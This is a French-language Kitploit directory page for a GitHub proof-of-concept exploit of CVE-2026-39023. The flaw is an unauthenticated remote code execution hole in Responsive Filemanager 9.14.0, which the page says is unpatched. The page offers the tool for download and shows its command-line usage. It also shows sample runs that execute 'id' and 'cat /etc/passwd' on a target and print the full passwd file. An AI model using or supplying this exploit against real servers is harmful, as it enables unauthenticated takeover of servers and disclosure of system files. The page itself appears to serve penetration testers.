Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-39023 — RCE RESPONSIVE filemanager v.9.14.0 | Kitploit
Outils/GitHubGitHub/pierreadams/cve-2026-39023
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed Teaming
GitHubpierreadams/cve-2026-39023

CVE-2026-39023

RCE RESPONSIVE filemanager v.9.14.0

Voir le dépôt
2il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-39023

PoC RCE - RESPONSIVE filemanager v.9.14.0 (dernière version – non corrigé)

Projet Github : https://github.com/trippo/ResponsiveFilemanager

Prérequis : Aucun prérequis, cet exploit est non authentifié.

L'application Responsive Filemanager est un outil de gestion de fichiers basé sur le web utilisé pour manipuler des fichiers sur un serveur. Cette vulnérabilité (CVE-2026-39023) permet à un attaquant d'exploiter la duplication de fichiers pour créer un fichier php, conduisant à une exécution de code à distance sur le système cible. (https://www.cve.org/CVERecord/SearchResults?query=CVE-2026-39023)

Utilisation :

root@kitploit:~
$python3 POC_CVE-2026-39023.py -h
usage: POC_CVE-2026-39023.py [-h] [-C COOKIE] -c COMMAND -u URL

RCE Exploit RESPONSIVE filemanager CVE-2026-39023

options:
  -h, --help            show this help message and exit
  -C COOKIE, --cookie COOKIE
  -c COMMAND, --command COMMAND
  -u URL, --url URL
root@kitploit:~
$ python3 POC_CVE-2026-39023.py -c 'id' -u http://127.0.0.1:8080 
[>] Collecting cookie...
[>] Cookie collected: aaf4dc1d4ceadaaafd5436aa96afecef
[>] Creating file...
[>] File successfully saved
[>] Response:

uid=1000(application) gid=1000(application) groups=1000(application)

Vous pouvez spécifier un cookie :

root@kitploit:~
Télécharger l’outil
$ python3 POC_CVE-2026-39023.py -c 'cat /etc/passwd' -u http://127.0.0.1:8080 -C Cookie_Test [>] Cookie : Cookie_Test [>] Cookie collect : PHPSESSID=Cookie_Test [>] Requets POST Send [>] Payload send [>] Response: root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin application:x:1000:1000::/home/application:/bin/bash blackfire:x:999:999::/dev/null:/bin/sh postfix:x:101:104::/var/spool/postfix:/usr/sbin/nologin